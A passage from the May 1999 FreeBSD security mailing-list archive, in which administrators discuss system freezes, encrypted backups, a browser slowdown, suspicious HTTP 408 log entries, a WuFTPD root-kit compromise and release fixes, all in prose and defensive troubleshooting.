Solutions P/L X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: Unknow User Cc: freebsd-security@FreeBSD.ORG Subject: Re: user uses xv3.10a (PNG) to halt my system. References: <3740B863.6C20B59E@tdnet.com.br> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Unknow User wrote: > > Dear gentleman, > > probably, this is not the most suitable mailing list to post this mesg, > but it's not worth to subscribe fbsd-questions only to get a answer. (if > you hate me for that, ignore me) > > a) My system is 2.2.8Stable, where can i get a updated list about patch > to this system? > b) I have installed xv 3.10a (PNG), but my system has got freezed by > running this software! So now, a user(i don't know which) have being > stopping my system. > c) is there possible to know which user is doing that? > d) How can an user application halt my system, isn't fbsd supposed to be > robust enough to handle this ? > It could also be that you and the other user are too impatient - if you're opening a large image file with 24 bit colour on a machine running in 8-bit colour AND you have selected the "Best 24->8" dithering option in xv and you're low on either RAM or CPU grunt (ie:using a low-end PC) then you can expect the time to display that image to be a long time - of the order of several minutes, more so if you're swapping at the same time. I'd be interested to see the output of top here, whilst xv is running. A quick question: when you say 'freezed' what do you mean? a) Totally hung - no response from the machine AT ALL (includes inability to reach it across the network). b) Partially hung - machine is still doing 'something' (disks working/clock if visible is still ticking, etc) c) Not hung - top shows xv using all CPU for a long time, but other processes continue to run, although very slowly. Also, d) What size images are you trying to use (in k or M) e) Does xv start at all, or just 'freeze' the system immediately? -- Regards | _/\_/\ Andrew Johns BSc (Comp Sci) | / \ TurnAround Solutions Pty Ltd | \_...__/ http://www.turnaround.com.au/ | \/ "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 20:33:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.enteract.com (thor.enteract.com [207.229.143.11]) by hub.freebsd.org (Postfix) with SMTP id 5B67914A09 for ; Mon, 17 May 1999 20:33:55 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 27966 invoked from network); 18 May 1999 03:33:55 -0000 Received: from shell-3.enteract.com (dscheidt@207.229.143.42) by thor.enteract.com with SMTP; 18 May 1999 03:33:55 -0000 Received: from localhost (dscheidt@localhost) by shell-3.enteract.com (8.9.3/8.9.2) with SMTP id WAA06346; Mon, 17 May 1999 22:33:54 -0500 (CDT) (envelope-from dscheidt@enteract.com) X-Authentication-Warning: shell-3.enteract.com: dscheidt owned process doing -bs Date: Mon, 17 May 1999 22:33:54 -0500 (CDT) From: David Scheidt To: CONDOR Cc: "'John Fieber'" , Wes Peters , "nr1@ihug.co.nz" , "freebsd-security@FreeBSD.ORG" Subject: RE: secure backup In-Reply-To: <01BEA09E.DA43B5A0.condor@inreach.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, CONDOR wrote: :On Mon, 17 May 1999, Wes Peters wrote: :> > Can anyone recommend how I should go about creating a backup to an untrusted :> > machine that has the tape drive, and using an untrusted network. :[CONDOR] Buy a tape drive.. they are cheaper now than before. ;-) Yeah, but if you are trusting someone to the tape handling for you, you need to put encrypted data onto the tape. There are any number of reasons you might have someone you don't trust handling you tapes. Say you have a machine in a remote data center, because 'Net connectivity is much cheaper. I would trust a reputable provider to do backups as I dictated, but I wouldn't trust them not to take a look at my tapes. David Scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 1:55: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 15F5415593 for ; Tue, 18 May 1999 01:54:41 -0700 (PDT) (envelope-from shelton@granch.ru) Received: from granch.ru (1001@localhost.granch.ru [127.0.0.1]) by sentry.granch.ru (8.8.8/8.8.7) with ESMTP id PAA00316; Tue, 18 May 1999 15:53:44 +0700 (NSS) (envelope-from shelton@granch.ru) Message-ID: <37412A96.99E83C0E@granch.ru> Date: Tue, 18 May 1999 15:53:42 +0700 From: "Rashid N. Achilov" Organization: Granch Ltd. X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 2.2.8-RELEASE i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp) References: Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roger Marquis wrote: > > Has anyone attempted to browse: > > http://microsoft.com/NTServer/all/Downloads.asp > > using Netscape Navigator and noticed what seems to be an HTML denial of > service? I've tested this page with Javascript on and off, Java on and > off, cookies on and off, stylesheets off, under FreeBSD, Linux and > Solaris and the behavior is consistent: > > * Navigator freezes for several seconds > * CPU utilization climbs briefly to near 100% > * memory usage climbs by 11MB > * the 11MB or memory are not released even after leaving > the page and clearing disk and RAM caches. > > After 7 minutes loading Netscape break with core dump :-( CPU utilization slowly up to 80%, next going in swap reading state, CPU utilization down, Netscape down with core dump :-(...FreeBSD 2.2.8, 32Mb RAM, Java on, JScript on, cookies on. Netscape Communicator 4.51 english -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Granch Ltd. lead engineer e-mail: achilov@granch.ru, tel (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 2:39:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from remus.clara.net (remus.clara.net [195.8.69.79]) by hub.freebsd.org (Postfix) with ESMTP id C990814BD2 for ; Tue, 18 May 1999 02:39:55 -0700 (PDT) (envelope-from mry@clara.net) Received: from mry (du-027-0222.claranet.co.uk [195.8.81.222]) by remus.clara.net (8.8.8/8.8.8) with SMTP id KAA16534 for ; Tue, 18 May 1999 10:36:35 +0100 (BST) (envelope-from mry@clara.net) Message-ID: <003c01bea113$08244d80$de5108c3@mry> From: "Mry" To: Subject: Date: Tue, 18 May 1999 10:44:31 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.1 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth d5999d9e subscribe freebsd-security marc@web-land.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 2:49:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta2-rme.xtra.co.nz (mta.xtra.co.nz [203.96.92.3]) by hub.freebsd.org (Postfix) with ESMTP id DA06814CFF for ; Tue, 18 May 1999 02:49:51 -0700 (PDT) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker ([210.55.152.50]) by mta2-rme.xtra.co.nz (InterMail v04.00.02.07 201-227-108) with SMTP id <19990518095202.EPCY7623210.mta2-rme@wocker> for ; Tue, 18 May 1999 21:52:02 +1200 From: "Dan Langille" Organization: The FreeBSD Diary To: freebsd-security@freebsd.org Date: Tue, 18 May 1999 21:49:49 +1200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: http attack(?) Reply-To: junkmale@xtra.co.nz X-mailer: Pegasus Mail for Win32 (v3.01d) Message-Id: <19990518095202.EPCY7623210.mta2-rme@wocker> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A few days ago, I noticed my machine was running extremely slowly. I did a top 10 at the console and got "too many open files". Existing telnet sessions were non-responsive. New telnets would not start. I then tried a top 5. named and syslogd were busy. I looked at httpd.error and 21 of these spread over 14 seconds: [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system Looking in the access logs for one of my virtual websites I found this. Bits have been snipped to save repetition and conserve space. per.wave.orc.ru - - [15/May/1999:10:55:57 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:10:56:58 +1200] "-" 408 - [etc] per.wave.orc.ru - - [15/May/1999:16:42:21 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:42:49 +1200] "-" 408 - 212.48.133.22 - - [15/May/1999:16:45:30 +1200] "-" 408 - 212.48.133.22 - - [15/May/1999:16:46:19 +1200] "-" 408 - [at which point I guess httpd decided not to translate any more or named gave up] [this is also roughly the point at which I noticed the system was slowing] 212.48.133.22 - - [15/May/1999:16:55:35 +1200] "-" 408 - 212.48.133.22 - - [15/May/1999:16:55:40 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 - 212.48.133.22 - - [15/May/1999:16:55:59 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:56:05 +1200] "-" 408 - per.wave.orc.ru - - [15/May/1999:16:56:47 +1200] "-" 408 - [etc] per.wave.orc.ru - - [15/May/1999:17:14:13 +1200] "-" 408 - [ends] I shortly thereafter started blocking this address at my firewall. A further 200 or so packets were blocked. No further activity has been seen. Messages sent to various addresses at orc.ru have gone unanswered. Is this a known attack? A browser gone mad? A remark on irc was that httpd was trying to consume more resources than the machine possessed. -- Dan Langille - DVL Software Limited The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 3:15:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.prime.net.ua (mail.prime.net.ua [195.64.229.2]) by hub.freebsd.org (Postfix) with ESMTP id 539F414CFF for ; Tue, 18 May 1999 03:15:49 -0700 (PDT) (envelope-from andyo@mail.prime.net.ua) Received: from localhost (andyo@localhost) by mail.prime.net.ua (8.9.3/8.9.3) with SMTP id NAA16998; Tue, 18 May 1999 13:15:29 +0300 (EEST) Date: Tue, 18 May 1999 13:15:28 +0300 (EEST) From: "Andy V. Oleynik" To: Dan Langille Cc: freebsd-security@FreeBSD.ORG Subject: Re: http attack(?) In-Reply-To: <19990518095202.EPCY7623210.mta2-rme@wocker> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If U remember, there was a problem in sendmail up to 8.9.2 with msgheader length exploit (starting 5 sessions has catastrofically slowed system down). My guess is giving a request to HTTP like this "GET /vary.long.maybe.even.not.existent.URL..." could lead to this problem. But it maybe the question to apache.org. On Tue, 18 May 1999, Dan Langille wrote: > A few days ago, I noticed my machine was running extremely slowly. I did a top 10 at the console and > got "too many open files". Existing telnet sessions were non-responsive. New telnets would not start. > > I then tried a top 5. named and syslogd were busy. > > I looked at httpd.error and 21 of these spread over 14 seconds: > [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system > > Looking in the access logs for one of my virtual websites I found this. Bits have been snipped to save > repetition and conserve space. > > per.wave.orc.ru - - [15/May/1999:10:55:57 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:10:56:58 +1200] "-" 408 - > > [etc] > > per.wave.orc.ru - - [15/May/1999:16:42:21 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:42:49 +1200] "-" 408 - > 212.48.133.22 - - [15/May/1999:16:45:30 +1200] "-" 408 - > 212.48.133.22 - - [15/May/1999:16:46:19 +1200] "-" 408 - > > [at which point I guess httpd decided not to translate any more or named gave up] > > [this is also roughly the point at which I noticed the system was slowing] > > 212.48.133.22 - - [15/May/1999:16:55:35 +1200] "-" 408 - > 212.48.133.22 - - [15/May/1999:16:55:40 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 - > 212.48.133.22 - - [15/May/1999:16:55:59 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:56:05 +1200] "-" 408 - > per.wave.orc.ru - - [15/May/1999:16:56:47 +1200] "-" 408 - > > [etc] > > per.wave.orc.ru - - [15/May/1999:17:14:13 +1200] "-" 408 - > > [ends] > > I shortly thereafter started blocking this address at my firewall. A further 200 or so packets were > blocked. No further activity has been seen. Messages sent to various addresses at orc.ru have gone > unanswered. > > Is this a known attack? A browser gone mad? > > A remark on irc was that httpd was trying to consume more resources than the machine possessed. > -- > Dan Langille - DVL Software Limited > The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/ > NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ > The Racing System - http://www.racingsystem.com/racingsystem.htm > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 3:29:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail-gw2.pacbell.net (mail-gw2.pacbell.net [206.13.28.53]) by hub.freebsd.org (Postfix) with ESMTP id 747DB1545F for ; Tue, 18 May 1999 03:29:21 -0700 (PDT) (envelope-from wellsian@caffeine.com) Received: from smartypants.caffeine.com. (adsl-209-233-24-51.dsl.snfc21.pacbell.net [209.233.24.51]) by mail-gw2.pacbell.net (8.8.8/8.7.1+antispam) with ESMTP id DAA02014 for ; Tue, 18 May 1999 03:29:20 -0700 (PDT) Date: Tue, 18 May 1999 03:26:05 -0700 (PDT) From: wellsian To: security@FreeBSD.ORG Subject: Re: network scan? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > Just to make sure I'm getting this right - you're saying China > > > > has a censored internet gateway (i.e. blocking *something* [what > > > > exactly ?] ), but they do allow connections to ports 1080, 3128 > > > > and 8080 ? > > > > > > They block access to sites, not to ports. In particular, sites that > > > carry capitalist misinformation, or what we in the free world call > > > "news." > > > > Hmm, but who can tell where EXACTLY *they* are trying to go to ? As in, > > can you see things like 'www.abc.com' and such ? Or is more like > > along the lines of www.max-XXX.org - you get the idea ? > > Not unless you have a proxy up, no. But I do see where you're going. > My response *must* be "Get your mind out of the gutter (so mine can > float by.)" ;^) As I understand it they're using transparent proxies. Could be big inktomi iron, alteon, or just some fbsd boxes. They can do anything from simple blocking to re-routing users to "cleansed" versions of otherwise objectionable sites. Cnn might start to get interesting after censors had their way. :) And the users never have to know... (Sure, someone would figure it out but would the masses care or understand?) Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 5:51:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from unix1.it-datacntr.louisville.edu (unix1.it-datacntr.louisville.edu [136.165.4.27]) by hub.freebsd.org (Postfix) with ESMTP id C3329156D6 for ; Tue, 18 May 1999 05:50:46 -0700 (PDT) (envelope-from k.stevenson@louisville.edu) Received: from homer.louisville.edu (ktstev01@homer.louisville.edu [136.165.1.20]) by unix1.it-datacntr.louisville.edu (8.8.8/8.8.7) with ESMTP id IAA24906 for ; Tue, 18 May 1999 08:50:44 -0400 Received: (from ktstev01@localhost) by homer.louisville.edu (8.8.8/8.8.8) id IAA08118 for freebsd-security@freebsd.org; Tue, 18 May 1999 08:50:44 -0400 (EDT) Message-ID: <19990518085043.A6970@homer.louisville.edu> Date: Tue, 18 May 1999 08:50:43 -0400 From: Keith Stevenson To: freebsd-security@freebsd.org Subject: Re: Interesting Attack References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Kris Kennaway on Tue, May 18, 1999 at 09:19:18AM +0930 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 18, 1999 at 09:19:18AM +0930, Kris Kennaway wrote: > > I was getting hundreds of similar packets per day here a few weeks ago, almost > all from different sites, all from spoofed source addresses, to a nonexistent > IP address and on an unobtrusive port number (1584) but the common thread was > that all of the source hosts were running an IRC daemon. I never did find out > conclusively what it was, but my guess is that someone was using my source > address to spoof packets from, and I was seeing reverse probes by the IRC > server. > > It all stopped when I turned on IP unreachables on my firewall.. We just had a Linux box fall victim to the WuFTPD/realpath(3) exploit. The cracker installed a slew of IRC tools, a sniffer, and a scanner which behaved very similarly to what you described. Thankfully it was on a switched network which limited the damage done by the sniffer, and the script-kiddie who broke in neglected to install the trojans included in his root-kit. This made the ircd very easy to find once the Linux-user noticed that his system load was awfully high. Anyway, since this thing had "root-kit" written all over it, it wouldn't surprise me in the slightest if there are lots of broken linux boxen on the internet running these scans. Regards, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville k.stevenson@louisville.edu PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 9:40:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 8C63014F1C for ; Tue, 18 May 1999 09:40:38 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id JAA13413; Tue, 18 May 1999 09:39:39 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id JAA02426; Tue, 18 May 1999 09:39:39 -0700 Received: from softweyr.com (dyn1.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA04688; Tue, 18 May 99 09:39:33 PDT Message-Id: <374197C5.AD8734F5@softweyr.com> Date: Tue, 18 May 1999 10:39:33 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: "Rashid N. Achilov" Cc: Roger Marquis , security@FreeBSD.ORG Subject: Re: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp) References: <37412A96.99E83C0E@granch.ru> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rashid N. Achilov" wrote: > > Roger Marquis wrote: > > > > Has anyone attempted to browse: > > > > http://microsoft.com/NTServer/all/Downloads.asp > > > > using Netscape Navigator and noticed what seems to be an HTML denial of > > service? I've tested this page with Javascript on and off, Java on and > > off, cookies on and off, stylesheets off, under FreeBSD, Linux and > > Solaris and the behavior is consistent: > > > > * Navigator freezes for several seconds > > * CPU utilization climbs briefly to near 100% > > * memory usage climbs by 11MB > > * the 11MB or memory are not released even after leaving > > the page and clearing disk and RAM caches. > > > > > > After 7 minutes loading Netscape break with core dump :-( CPU > utilization slowly up to 80%, next going in swap reading state, CPU > utilization down, Netscape down with core dump :-(...FreeBSD 2.2.8, 32Mb > RAM, Java on, JScript on, cookies on. Netscape Communicator 4.51 english Machine: PII/300, 64MB, NeoMagic 128. Netscape: 4.51 Linux/ELF FreeBSD: 3.1-RELEASE Netscape topped out at 83.45% CPU, but drew the page in 1:05. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 10: 9:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id B470914FC9 for ; Tue, 18 May 1999 10:09:19 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id LAA05646 for ; Tue, 18 May 1999 11:09:16 -0600 (MDT) Message-Id: <4.2.0.37.19990518110133.00b58da0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Tue, 18 May 1999 11:09:12 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: Is 3.2-R safe? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just saw the announcement of 3.2-R. We'd been planning to migrate some of our systems to this version, but before we install, we need to know: Has the "double free" problem that causes the system to crash under a SYN flood attack been fixed? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 15:33:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p22-max8.wlg.ihug.co.nz [209.79.142.214]) by hub.freebsd.org (Postfix) with ESMTP id A893714DDA for ; Tue, 18 May 1999 15:33:14 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id BAA09186; Wed, 19 May 1999 01:56:28 +1200 (NZST) Message-Id: <199905181356.BAA09186@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: junkmale@xtra.co.nz Cc: freebsd-security@FreeBSD.ORG Subject: Re: http attack(?) In-reply-to: Your message of "Tue, 18 May 1999 21:49:49 +1200." <19990518095202.EPCY7623210.mta2-rme@wocker> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 19 May 1999 01:56:28 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > A few days ago, I noticed my machine was running extremely slowly. I did a top 10 at the console and > got "too many open files". Existing telnet sessions were non-responsive. New telnets would not start. > > I then tried a top 5. named and syslogd were busy. > > I looked at httpd.error and 21 of these spread over 14 seconds: > [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system I'm not too sure whether to trust that the restriction on file handles is system wide. Some programs may not know about FreeBSD's process limits scheme. Check the output of 'limits' and 'sysctl -a | grep maxfiles'. They might give you a better idea what is happening. The context in which you run limits is important, but if your shell is failing, then that shell is probably a good thing to have a look at. limits is a shell built-in under sh and bash, and will not spawn a new process. Andrew McNaughton -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 15:33:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p22-max8.wlg.ihug.co.nz [209.79.142.214]) by hub.freebsd.org (Postfix) with ESMTP id C0B29154B5 for ; Tue, 18 May 1999 15:33:14 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id BAA09208; Wed, 19 May 1999 01:58:19 +1200 (NZST) Message-Id: <199905181358.BAA09208@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Kris Kennaway Cc: Adam Shostack , Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-reply-to: Your message of "Mon, 17 May 1999 23:09:09 +0930." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 19 May 1999 01:58:19 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > I was talking about authentication for access to the tape server process > itself (preventing other people from writing onto your tape). You're correct > about PGP - it's probably better to use PGP instead of bdes (or equivalent > symmetric encryption filter) for this reason - verification that your data > stream was read back intact (and assuming perfect retrieval, was stored > intact) when you restore. If the backup is bigger than available space, then the stream would have to be processed twice, once to do the checksum, and then if that passed, a second time to actually restore files. Backups tend to be large, and temporary storage of the received stream is likely not to be an option. No doubt some sort of block checksumming approach could be taken. Andrew McNaughton -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 18 17: 4:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id CC77914D52 for ; Tue, 18 May 1999 17:04:51 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id JAA07492; Wed, 19 May 1999 09:34:50 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA09371; Wed, 19 May 1999 09:35:40 +0930 Date: Wed, 19 May 1999 09:35:39 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Keith Stevenson Cc: freebsd-security@freebsd.org Subject: Re: Interesting Attack In-Reply-To: <19990518085043.A6970@homer.louisville.edu> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 18 May 1999, Keith Stevenson wrote: > We just had a Linux box fall victim to the WuFTPD/realpath(3) exploit. The > cracker installed a slew of IRC tools, a sniffer, and a scanner which behaved > very similarly to what you described. Thankfully it was on a switched network > which limited the damage done by the sniffer, and the script-kiddie who broke > in neglected to install the trojans included in his root-kit. This made the > ircd very easy to find once the Linux-user noticed that his system load was > awfully high. > > Anyway, since this thing had "root-kit" written all over it, it wouldn't > surprise me in the slightest if there are lots of broken linux boxen on the > internet running these scans. I thought of that too in my case, but port-scanning some of the originating boxes showed no common threads other than they were all running IRC daemons. nmap reported a wide range of OSes, too (including a lot of BSDs), and from correspondence with the admins they showed nothing out of the ordinary on their systems.. Kris > Regards, > --Keith Stevenson-- > > -- > Keith Stevenson > System Programmer - Data Center Services - University of Louisville > k.stevenson@louisville.edu > PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 5: 2:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 54E4B14C4A for ; Wed, 19 May 1999 05:02:03 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id QAA28742; Wed, 19 May 1999 16:02:01 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id QAA08832; Wed, 19 May 1999 16:01:45 +0400 (MSD) Date: Wed, 19 May 1999 16:01:45 +0400 (MSD) From: "Ilmar S. Habibulin" To: posix1e@cyrus.watson.org, freebsd-security@freebsd.org Subject: secure deletion Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org May be it's an freebsd-fs@ question, but i think that it belings here to. I heard that some linux fs (maybe extfs2?) have some secure deletion flag, which being set on inode(file or dir) cause content of this file to be wiped before deletion, so even if somebody manage to restore file, its content would be unusable. I think, that it is nice feature, and i would like to see it in freebsd. What would you say? PS. I have implementation of this feature for freebsd-2.2.5. May be i can port it to 3.x. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 6:57:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 0AABA154D9 for ; Wed, 19 May 1999 06:57:33 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA14946; Wed, 19 May 1999 10:57:08 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199905191357.KAA14946@ns1.sminter.com.ar> Subject: Re: Is 3.2-R safe? In-Reply-To: <4.2.0.37.19990518110133.00b58da0@localhost> from Brett Glass at "May 18, 99 11:09:12 am" To: 